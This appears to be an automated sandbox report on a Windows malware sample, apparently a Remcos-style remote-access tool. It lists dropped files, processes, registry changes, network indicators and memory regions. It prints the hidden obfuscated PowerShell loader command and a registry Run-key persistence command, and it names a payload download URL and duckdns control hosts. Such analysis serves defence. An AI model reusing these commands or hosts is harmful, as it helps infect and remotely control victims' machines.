Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
zR4aIjCuRs.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
||
C:\ProgramData\remcos\logs.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\Falkespors.Var
|
ASCII text, with very long lines (3209), with CRLF, LF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\zR4aIjCuRs.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
||
C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\zR4aIjCuRs.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msiexec.exe_6cf0e4ec34412705f7c7679452dd618a68a4ad_6bd5dc59_60d14e17-1202-42d6-adc8-8c198509b060\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msiexec.exe_7999b5829bb6649a4591b7178c861d362cefd5f_6bd5dc59_c269668f-8d0f-4b43-9053-87429be6c60a\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6A76.tmp.dmp
|
Mini DuMP crash report, 14 streams, Sun Oct 6 09:47:46 2024, 0x1205a4 type
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6B13.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6B33.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WEREB82.tmp.dmp
|
Mini DuMP crash report, 14 streams, Sun Oct 6 09:47:13 2024, 0x1205a4 type
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WEREC8C.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WERECCC.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0sffczvd.ngz.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_edvwaufn.oq1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hshqsjft.zq2.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xcnbu3an.5pv.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\Ensuable47.haa
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\Kastepils.paa
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\Klitoriser51.adm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\Loquaciousness.Acc
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\gangsterfilmen.sky
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\stoejdelen.aud
|
data
|
dropped
|
There are 14 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\zR4aIjCuRs.exe
|
"C:\Users\user\Desktop\zR4aIjCuRs.exe"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -windowstyle hidden "$Sudadero=Get-Content -Raw 'C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\Falkespors.Var';$Maalkastets=$Sudadero.SubString(54266,3);.$Maalkastets($Sudadero)
"
|
||
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
||
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
||
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ
/d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle
1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)"
|
||
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -u -p 1264 -s 2324
|
||
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -u -p 1264 -s 1068
|
There are 1 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
q92harbu03.duckdns.org
|
|||
http://pesterbdd.com/images/Pester.png4
|
unknown
|
||
https://github.com/Pester/Pester4
|
unknown
|
||
https://simonastolerciuc.ro/M
|
unknown
|
||
https://simonastolerciuc.ro/images/vnlXriHFWaBU97.binqH
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://simonastolerciuc.ro/images/vnlXriHFWaBU97.bin
|
85.120.16.93
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
https://aka.ms/pscore6lB
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
http://crl.microsof
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://simonastolerciuc.ro/images/vnlXriHFWaBU97.binreinsEsrblog.ervadegato.com.br/vnlXriHFWaBU97.b
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
http://www.quovadis.bm0
|
unknown
|
||
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
https://ocsp.quovadisoffshore.com0
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://simonastolerciuc.ro/
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html4
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
There are 13 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
janbours92harbu04.duckdns.org
|
45.74.58.7
|
||
janbours92harbu03.duckdns.org
|
192.169.69.26
|
||
janbours92harbu007.duckdns.org
|
unknown
|
||
simonastolerciuc.ro
|
85.120.16.93
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
192.169.69.26
|
janbours92harbu03.duckdns.org
|
United States
|
||
45.74.58.7
|
janbours92harbu04.duckdns.org
|
United States
|
||
85.120.16.93
|
simonastolerciuc.ro
|
Romania
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Bistratose
|
Funklet114
|
||
HKEY_CURRENT_USER\Environment
|
forenamed
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-MK0QHY
|
exepath
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-MK0QHY
|
licence
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-MK0QHY
|
time
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Tragacanth
|
||
\REGISTRY\A\{fa7cea42-2a1b-3455-61c0-84033543b2c1}\Root\InventoryApplicationFile\msiexec.exe|3f28dab03ad0bd04
|
ProgramId
|
||
\REGISTRY\A\{fa7cea42-2a1b-3455-61c0-84033543b2c1}\Root\InventoryApplicationFile\msiexec.exe|3f28dab03ad0bd04
|
FileId
|
||
\REGISTRY\A\{fa7cea42-2a1b-3455-61c0-84033543b2c1}\Root\InventoryApplicationFile\msiexec.exe|3f28dab03ad0bd04
|
LowerCaseLongPath
|
||
\REGISTRY\A\{fa7cea42-2a1b-3455-61c0-84033543b2c1}\Root\InventoryApplicationFile\msiexec.exe|3f28dab03ad0bd04
|
LongPathHash
|
||
\REGISTRY\A\{fa7cea42-2a1b-3455-61c0-84033543b2c1}\Root\InventoryApplicationFile\msiexec.exe|3f28dab03ad0bd04
|
Name
|
||
\REGISTRY\A\{fa7cea42-2a1b-3455-61c0-84033543b2c1}\Root\InventoryApplicationFile\msiexec.exe|3f28dab03ad0bd04
|
OriginalFileName
|
||
\REGISTRY\A\{fa7cea42-2a1b-3455-61c0-84033543b2c1}\Root\InventoryApplicationFile\msiexec.exe|3f28dab03ad0bd04
|
Publisher
|
||
\REGISTRY\A\{fa7cea42-2a1b-3455-61c0-84033543b2c1}\Root\InventoryApplicationFile\msiexec.exe|3f28dab03ad0bd04
|
Version
|
||
\REGISTRY\A\{fa7cea42-2a1b-3455-61c0-84033543b2c1}\Root\InventoryApplicationFile\msiexec.exe|3f28dab03ad0bd04
|
BinFileVersion
|
||
\REGISTRY\A\{fa7cea42-2a1b-3455-61c0-84033543b2c1}\Root\InventoryApplicationFile\msiexec.exe|3f28dab03ad0bd04
|
BinaryType
|
||
\REGISTRY\A\{fa7cea42-2a1b-3455-61c0-84033543b2c1}\Root\InventoryApplicationFile\msiexec.exe|3f28dab03ad0bd04
|
ProductName
|
||
\REGISTRY\A\{fa7cea42-2a1b-3455-61c0-84033543b2c1}\Root\InventoryApplicationFile\msiexec.exe|3f28dab03ad0bd04
|
ProductVersion
|
||
\REGISTRY\A\{fa7cea42-2a1b-3455-61c0-84033543b2c1}\Root\InventoryApplicationFile\msiexec.exe|3f28dab03ad0bd04
|
LinkDate
|
||
\REGISTRY\A\{fa7cea42-2a1b-3455-61c0-84033543b2c1}\Root\InventoryApplicationFile\msiexec.exe|3f28dab03ad0bd04
|
BinProductVersion
|
||
\REGISTRY\A\{fa7cea42-2a1b-3455-61c0-84033543b2c1}\Root\InventoryApplicationFile\msiexec.exe|3f28dab03ad0bd04
|
AppxPackageFullName
|
||
\REGISTRY\A\{fa7cea42-2a1b-3455-61c0-84033543b2c1}\Root\InventoryApplicationFile\msiexec.exe|3f28dab03ad0bd04
|
AppxPackageRelativeId
|
||
\REGISTRY\A\{fa7cea42-2a1b-3455-61c0-84033543b2c1}\Root\InventoryApplicationFile\msiexec.exe|3f28dab03ad0bd04
|
Size
|
||
\REGISTRY\A\{fa7cea42-2a1b-3455-61c0-84033543b2c1}\Root\InventoryApplicationFile\msiexec.exe|3f28dab03ad0bd04
|
Language
|
||
\REGISTRY\A\{fa7cea42-2a1b-3455-61c0-84033543b2c1}\Root\InventoryApplicationFile\msiexec.exe|3f28dab03ad0bd04
|
IsOsComponent
|
||
\REGISTRY\A\{fa7cea42-2a1b-3455-61c0-84033543b2c1}\Root\InventoryApplicationFile\msiexec.exe|3f28dab03ad0bd04
|
Usn
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData
|
ClockTimeSeconds
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData
|
TickCount
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Property
|
0018C00E24D2A1F0
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}
|
DeviceTicket
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}
|
DeviceId
|
There are 21 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
A9BD000
|
direct allocation
|
page execute and read and write
|
||
6A22000
|
heap
|
page read and write
|
||
6A07000
|
heap
|
page read and write
|
||
6A11000
|
heap
|
page read and write
|
||
6A5C000
|
heap
|
page read and write
|
||
6AD000
|
stack
|
page read and write
|
||
8D70000
|
trusted library allocation
|
page read and write
|
||
8D80000
|
trusted library allocation
|
page read and write
|
||
21C00000
|
direct allocation
|
page read and write
|
||
222F0000
|
unkown
|
page readonly
|
||
95000
|
stack
|
page read and write
|
||
4D01000
|
trusted library allocation
|
page read and write
|
||
7417000
|
heap
|
page read and write
|
||
742000
|
heap
|
page read and write
|
||
7C10000
|
trusted library allocation
|
page read and write
|
||
578B000
|
trusted library allocation
|
page read and write
|
||
21A11000
|
heap
|
page read and write
|
||
224A0000
|
direct allocation
|
page read and write
|
||
2D47000
|
heap
|
page read and write
|
||
88EC000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
408000
|
unkown
|
page readonly
|
||
228EB000
|
stack
|
page read and write
|
||
47A000
|
unkown
|
page readonly
|
||
462000
|
unkown
|
page readonly
|
||
7395000
|
heap
|
page read and write
|
||
6940000
|
direct allocation
|
page read and write
|
||
5F1D000
|
trusted library allocation
|
page read and write
|
||
7B80000
|
heap
|
page read and write
|
||
66D000
|
stack
|
page read and write
|
||
21B40000
|
direct allocation
|
page read and write
|
||
82D0000
|
direct allocation
|
page read and write
|
||
88DF000
|
heap
|
page read and write
|
||
69A8000
|
heap
|
page read and write
|
||
8944000
|
heap
|
page read and write
|
||
22620000
|
remote allocation
|
page read and write
|
||
567D000
|
remote allocation
|
page execute and read and write
|
||
6774000
|
heap
|
page read and write
|
||
6770000
|
heap
|
page read and write
|
||
73A0000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
2258E000
|
stack
|
page read and write
|
||
2C70000
|
heap
|
page read and write
|
||
21B90000
|
direct allocation
|
page read and write
|
||
76E000
|
stack
|
page read and write
|
||
8C11000
|
trusted library allocation
|
page read and write
|
||
70D0000
|
heap
|
page read and write
|
||
6A5000
|
heap
|
page read and write
|
||
5DE000
|
stack
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
2265E000
|
stack
|
page read and write
|
||
7C40000
|
trusted library allocation
|
page read and write
|
||
5478000
|
trusted library allocation
|
page read and write
|
||
828E000
|
stack
|
page read and write
|
||
21A11000
|
heap
|
page read and write
|
||
21C40000
|
direct allocation
|
page read and write
|
||
8C15000
|
trusted library allocation
|
page read and write
|
||
8A5A000
|
heap
|
page read and write
|
||
7C00000
|
trusted library allocation
|
page read and write
|
||
6F90000
|
direct allocation
|
page read and write
|
||
43F000
|
unkown
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
2CF0000
|
remote allocation
|
page execute and read and write
|
||
6A67000
|
heap
|
page read and write
|
||
6FE0000
|
direct allocation
|
page read and write
|
||
6DFE000
|
stack
|
page read and write
|
||
74B000
|
heap
|
page read and write
|
||
8820000
|
trusted library allocation
|
page read and write
|
||
8BE0000
|
direct allocation
|
page read and write
|
||
743000
|
heap
|
page read and write
|
||
2FC0000
|
trusted library section
|
page read and write
|
||
3010000
|
trusted library allocation
|
page read and write
|
||
BDBD000
|
direct allocation
|
page execute and read and write
|
||
3050000
|
trusted library allocation
|
page execute and read and write
|
||
2A60000
|
heap
|
page read and write
|
||
431000
|
unkown
|
page read and write
|
||
8FC0000
|
trusted library allocation
|
page execute and read and write
|
||
2FF0000
|
heap
|
page read and write
|
||
893B000
|
heap
|
page read and write
|
||
2292E000
|
stack
|
page read and write
|
||
2296C000
|
stack
|
page read and write
|
||
8FF000
|
stack
|
page read and write
|
||
455000
|
unkown
|
page readonly
|
||
6774000
|
heap
|
page read and write
|
||
86F4000
|
stack
|
page read and write
|
||
22490000
|
direct allocation
|
page read and write
|
||
3260000
|
trusted library allocation
|
page read and write
|
||
87E0000
|
trusted library allocation
|
page execute and read and write
|
||
300A000
|
trusted library allocation
|
page execute and read and write
|
||
69EA000
|
heap
|
page read and write
|
||
4818000
|
trusted library allocation
|
page read and write
|
||
8EE0000
|
trusted library allocation
|
page read and write
|
||
221F0000
|
heap
|
page read and write
|
||
6FA0000
|
direct allocation
|
page read and write
|
||
777D000
|
stack
|
page read and write
|
||
7D20000
|
trusted library allocation
|
page read and write
|
||
620000
|
heap
|
page read and write
|
||
2269F000
|
stack
|
page read and write
|
||
21FDE000
|
stack
|
page read and write
|
||
25E0000
|
heap
|
page read and write
|
||
600000
|
heap
|
page read and write
|
||
8810000
|
trusted library allocation
|
page read and write
|
||
CEB0000
|
trusted library allocation
|
page read and write
|
||
693E000
|
unkown
|
page read and write
|
||
6950000
|
heap
|
page read and write
|
||
4840000
|
trusted library allocation
|
page read and write
|
||
6B4000
|
heap
|
page read and write
|
||
C7BD000
|
direct allocation
|
page execute and read and write
|
||
5D01000
|
trusted library allocation
|
page read and write
|
||
780000
|
heap
|
page read and write
|
||
708000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
6EC5000
|
heap
|
page execute and read and write
|
||
AFE000
|
stack
|
page read and write
|
||
6DBB000
|
stack
|
page read and write
|
||
584B000
|
trusted library allocation
|
page read and write
|
||
6FC0000
|
direct allocation
|
page read and write
|
||
5861000
|
trusted library allocation
|
page read and write
|
||
2216E000
|
stack
|
page read and write
|
||
6F70000
|
direct allocation
|
page read and write
|
||
7000000
|
direct allocation
|
page read and write
|
||
5877000
|
trusted library allocation
|
page read and write
|
||
3067000
|
heap
|
page read and write
|
||
2960000
|
heap
|
page read and write
|
||
697A000
|
heap
|
page read and write
|
||
8AB7000
|
heap
|
page read and write
|
||
295F000
|
stack
|
page read and write
|
||
8BD0000
|
direct allocation
|
page read and write
|
||
8A94000
|
heap
|
page read and write
|
||
6A26000
|
heap
|
page read and write
|
||
8D60000
|
trusted library allocation
|
page execute and read and write
|
||
47F000
|
unkown
|
page readonly
|
||
49AE000
|
stack
|
page read and write
|
||
8923000
|
heap
|
page read and write
|
||
3012000
|
trusted library allocation
|
page read and write
|
||
76D0000
|
trusted library allocation
|
page read and write
|
||
2FD0000
|
trusted library allocation
|
page read and write
|
||
7C70000
|
trusted library allocation
|
page read and write
|
||
30000
|
heap
|
page read and write
|
||
4839000
|
heap
|
page read and write
|
||
625000
|
heap
|
page read and write
|
||
3030000
|
trusted library allocation
|
page read and write
|
||
6A1B000
|
heap
|
page read and write
|
||
49B0000
|
heap
|
page read and write
|
||
893F000
|
heap
|
page read and write
|
||
21C30000
|
direct allocation
|
page read and write
|
||
452000
|
unkown
|
page readonly
|
||
3760000
|
heap
|
page read and write
|
||
6F60000
|
direct allocation
|
page read and write
|
||
21B50000
|
direct allocation
|
page read and write
|
||
879D000
|
stack
|
page read and write
|
||
73C5000
|
heap
|
page read and write
|
||
6F20000
|
direct allocation
|
page read and write
|
||
7483000
|
heap
|
page read and write
|
||
2F60000
|
heap
|
page read and write
|
||
225CF000
|
stack
|
page read and write
|
||
21BD0000
|
direct allocation
|
page read and write
|
||
4580000
|
trusted library allocation
|
page read and write
|
||
768F000
|
stack
|
page read and write
|
||
7CBC000
|
stack
|
page read and write
|
||
894C000
|
heap
|
page read and write
|
||
2FE4000
|
trusted library allocation
|
page read and write
|
||
46B000
|
unkown
|
page readonly
|
||
427D000
|
remote allocation
|
page execute and read and write
|
||
2253F000
|
stack
|
page read and write
|
||
2239F000
|
stack
|
page read and write
|
||
9FBD000
|
direct allocation
|
page execute and read and write
|
||
3363000
|
heap
|
page read and write
|
||
360F000
|
unkown
|
page read and write
|
||
228AE000
|
stack
|
page read and write
|
||
21A20000
|
heap
|
page read and write
|
||
73E000
|
heap
|
page read and write
|
||
268E000
|
stack
|
page read and write
|
||
2FED000
|
trusted library allocation
|
page execute and read and write
|
||
462000
|
unkown
|
page readonly
|
||
824F000
|
unkown
|
page read and write
|
||
2FF0000
|
trusted library allocation
|
page read and write
|
||
6F40000
|
direct allocation
|
page read and write
|
||
2B70000
|
heap
|
page read and write
|
||
46B000
|
unkown
|
page readonly
|
||
3886000
|
heap
|
page read and write
|
||
73D5000
|
heap
|
page read and write
|
||
3300000
|
heap
|
page read and write
|
||
22020000
|
heap
|
page read and write
|
||
730E000
|
stack
|
page read and write
|
||
27CE000
|
stack
|
page read and write
|
||
69F9000
|
heap
|
page read and write
|
||
7BD0000
|
trusted library allocation
|
page read and write
|
||
6F50000
|
direct allocation
|
page read and write
|
||
93F0000
|
heap
|
page read and write
|
||
224B0000
|
direct allocation
|
page read and write
|
||
6F00000
|
direct allocation
|
page read and write
|
||
850000
|
heap
|
page read and write
|
||
492C000
|
stack
|
page read and write
|
||
226B0000
|
heap
|
page read and write
|
||
69ED000
|
heap
|
page read and write
|
||
22A6D000
|
stack
|
page read and write
|
||
47F000
|
unkown
|
page readonly
|
||
436000
|
unkown
|
page read and write
|
||
7471000
|
heap
|
page read and write
|
||
32FD000
|
stack
|
page read and write
|
||
6860000
|
heap
|
page read and write
|
||
22A2F000
|
stack
|
page read and write
|
||
22AAF000
|
stack
|
page read and write
|
||
21A00000
|
direct allocation
|
page read and write
|
||
8A62000
|
heap
|
page read and write
|
||
224FE000
|
stack
|
page read and write
|
||
3771000
|
heap
|
page read and write
|
||
6A26000
|
heap
|
page read and write
|
||
88B0000
|
direct allocation
|
page execute and read and write
|
||
740E000
|
heap
|
page read and write
|
||
6FF0000
|
direct allocation
|
page read and write
|
||
8BCD000
|
stack
|
page read and write
|
||
7C20000
|
trusted library allocation
|
page read and write
|
||
733000
|
heap
|
page read and write
|
||
8EF0000
|
trusted library allocation
|
page read and write
|
||
21C20000
|
direct allocation
|
page read and write
|
||
4E57000
|
trusted library allocation
|
page read and write
|
||
3882000
|
heap
|
page read and write
|
||
8D50000
|
trusted library allocation
|
page read and write
|
||
2D3A000
|
heap
|
page read and write
|
||
897E000
|
heap
|
page read and write
|
||
452000
|
unkown
|
page readonly
|
||
7CC0000
|
trusted library allocation
|
page execute and read and write
|
||
21B70000
|
direct allocation
|
page read and write
|
||
2201E000
|
stack
|
page read and write
|
||
59E000
|
stack
|
page read and write
|
||
6A22000
|
heap
|
page read and write
|
||
3340000
|
heap
|
page read and write
|
||
75D0000
|
heap
|
page execute and read and write
|
||
7C30000
|
trusted library allocation
|
page read and write
|
||
741B000
|
heap
|
page read and write
|
||
8ED0000
|
trusted library allocation
|
page read and write
|
||
7BC0000
|
trusted library allocation
|
page read and write
|
||
22620000
|
remote allocation
|
page read and write
|
||
2286D000
|
stack
|
page read and write
|
||
3060000
|
heap
|
page read and write
|
||
21BF0000
|
direct allocation
|
page read and write
|
||
7F200000
|
trusted library allocation
|
page execute and read and write
|
||
69E7000
|
heap
|
page read and write
|
||
7402000
|
heap
|
page read and write
|
||
19A000
|
stack
|
page read and write
|
||
748D000
|
heap
|
page read and write
|
||
2968000
|
stack
|
page read and write
|
||
6EE0000
|
direct allocation
|
page read and write
|
||
28F1000
|
unkown
|
page readonly
|
||
227EC000
|
stack
|
page read and write
|
||
76F0000
|
trusted library allocation
|
page read and write
|
||
464000
|
unkown
|
page readonly
|
||
5EF0000
|
trusted library allocation
|
page read and write
|
||
5856000
|
trusted library allocation
|
page read and write
|
||
6A5C000
|
heap
|
page read and write
|
||
6B0000
|
heap
|
page read and write
|
||
7BF0000
|
trusted library allocation
|
page read and write
|
||
21B60000
|
direct allocation
|
page read and write
|
||
226B1000
|
heap
|
page read and write
|
||
74A1000
|
heap
|
page read and write
|
||
291E000
|
stack
|
page read and write
|
||
7370000
|
trusted library allocation
|
page read and write
|
||
4860000
|
heap
|
page execute and read and write
|
||
607D000
|
remote allocation
|
page execute and read and write
|
||
3886000
|
heap
|
page read and write
|
||
66E000
|
stack
|
page read and write
|
||
742D000
|
heap
|
page read and write
|
||
7399000
|
heap
|
page read and write
|
||
891D000
|
heap
|
page read and write
|
||
95BD000
|
direct allocation
|
page execute and read and write
|
||
2EE0000
|
heap
|
page read and write
|
||
6960000
|
direct allocation
|
page read and write
|
||
29F0000
|
heap
|
page read and write
|
||
229ED000
|
stack
|
page read and write
|
||
21B10000
|
direct allocation
|
page read and write
|
||
2D18000
|
heap
|
page read and write
|
||
8A21000
|
heap
|
page read and write
|
||
73DD000
|
heap
|
page read and write
|
||
3040000
|
heap
|
page readonly
|
||
2FE3000
|
trusted library allocation
|
page execute and read and write
|
||
2968000
|
heap
|
page read and write
|
||
700000
|
heap
|
page read and write
|
||
6F30000
|
direct allocation
|
page read and write
|
||
764E000
|
stack
|
page read and write
|
||
455000
|
unkown
|
page readonly
|
||
2235E000
|
stack
|
page read and write
|
||
6FD0000
|
direct allocation
|
page read and write
|
||
6A9000
|
heap
|
page read and write
|
||
22480000
|
direct allocation
|
page read and write
|
||
3771000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page read and write
|
||
87DE000
|
stack
|
page read and write
|
||
8FF0000
|
heap
|
page read and write
|
||
6D7D000
|
stack
|
page read and write
|
||
438000
|
unkown
|
page read and write
|
||
69BB000
|
heap
|
page read and write
|
||
2D10000
|
heap
|
page read and write
|
||
8F6E000
|
stack
|
page read and write
|
||
7390000
|
heap
|
page read and write
|
||
4540000
|
heap
|
page read and write
|
||
76E0000
|
trusted library allocation
|
page execute and read and write
|
||
6956000
|
heap
|
page read and write
|
||
6D3F000
|
stack
|
page read and write
|
||
5490000
|
trusted library allocation
|
page read and write
|
||
5D29000
|
trusted library allocation
|
page read and write
|
||
7CD0000
|
trusted library allocation
|
page read and write
|
||
6A0000
|
heap
|
page read and write
|
||
9430000
|
direct allocation
|
page execute and read and write
|
||
548E000
|
trusted library allocation
|
page read and write
|
||
2E7D000
|
remote allocation
|
page execute and read and write
|
||
9FF000
|
stack
|
page read and write
|
||
88D0000
|
heap
|
page read and write
|
||
4D63000
|
trusted library allocation
|
page read and write
|
||
48EE000
|
stack
|
page read and write
|
||
2282C000
|
stack
|
page read and write
|
||
2FF9000
|
trusted library allocation
|
page read and write
|
||
B3BD000
|
direct allocation
|
page execute and read and write
|
||
6A67000
|
heap
|
page read and write
|
||
73E1000
|
heap
|
page read and write
|
||
22620000
|
remote allocation
|
page read and write
|
||
6F80000
|
direct allocation
|
page read and write
|
||
7C60000
|
trusted library allocation
|
page read and write
|
||
229AF000
|
stack
|
page read and write
|
||
75F000
|
heap
|
page read and write
|
||
22301000
|
unkown
|
page readonly
|
||
2FB0000
|
trusted library section
|
page read and write
|
||
82E0000
|
direct allocation
|
page read and write
|
||
6FB0000
|
direct allocation
|
page read and write
|
||
6ED0000
|
direct allocation
|
page read and write
|
||
21B30000
|
direct allocation
|
page read and write
|
||
2C7B000
|
stack
|
page read and write
|
||
2212C000
|
stack
|
page read and write
|
||
21C10000
|
direct allocation
|
page read and write
|
||
6850000
|
heap
|
page readonly
|
||
7F218000
|
trusted library allocation
|
page execute and read and write
|
||
28CF000
|
stack
|
page read and write
|
||
3347000
|
heap
|
page read and write
|
||
364E000
|
stack
|
page read and write
|
||
49B7000
|
heap
|
page read and write
|
||
278F000
|
stack
|
page read and write
|
||
8D40000
|
trusted library allocation
|
page read and write
|
||
6A5C000
|
heap
|
page read and write
|
||
8958000
|
heap
|
page read and write
|
||
73F000
|
heap
|
page read and write
|
||
4830000
|
heap
|
page read and write
|
||
7590000
|
heap
|
page read and write
|
||
7C50000
|
trusted library allocation
|
page read and write
|
||
72E000
|
stack
|
page read and write
|
||
8B8E000
|
stack
|
page read and write
|
||
7404000
|
heap
|
page read and write
|
||
8A3E000
|
heap
|
page read and write
|
||
3886000
|
heap
|
page read and write
|
||
2A30000
|
heap
|
page read and write
|
||
3890000
|
heap
|
page read and write
|
||
6A67000
|
heap
|
page read and write
|
||
586C000
|
trusted library allocation
|
page read and write
|
||
3015000
|
trusted library allocation
|
page execute and read and write
|
||
4C7D000
|
remote allocation
|
page execute and read and write
|
||
22440000
|
heap
|
page read and write
|
||
475000
|
unkown
|
page readonly
|
||
400000
|
unkown
|
page readonly
|
||
496E000
|
stack
|
page read and write
|
||
21B80000
|
direct allocation
|
page read and write
|
||
76CE000
|
stack
|
page read and write
|
||
387D000
|
remote allocation
|
page execute and read and write
|
||
2F4D000
|
stack
|
page read and write
|
||
6E3D000
|
stack
|
page read and write
|
||
7419000
|
heap
|
page read and write
|
||
21BE0000
|
direct allocation
|
page read and write
|
||
6EC0000
|
heap
|
page execute and read and write
|
||
292C000
|
stack
|
page read and write
|
||
7BE0000
|
trusted library allocation
|
page read and write
|
||
3367000
|
heap
|
page read and write
|
||
464000
|
unkown
|
page readonly
|
||
89A7000
|
heap
|
page read and write
|
||
8954000
|
heap
|
page read and write
|
||
2FE0000
|
trusted library allocation
|
page read and write
|
||
47A000
|
unkown
|
page readonly
|
||
69C2000
|
heap
|
page read and write
|
||
21BA0000
|
direct allocation
|
page read and write
|
||
2CBA000
|
stack
|
page read and write
|
||
5E0000
|
heap
|
page read and write
|
||
21A10000
|
heap
|
page read and write
|
||
2FCE000
|
unkown
|
page read and write
|
||
374F000
|
stack
|
page read and write
|
||
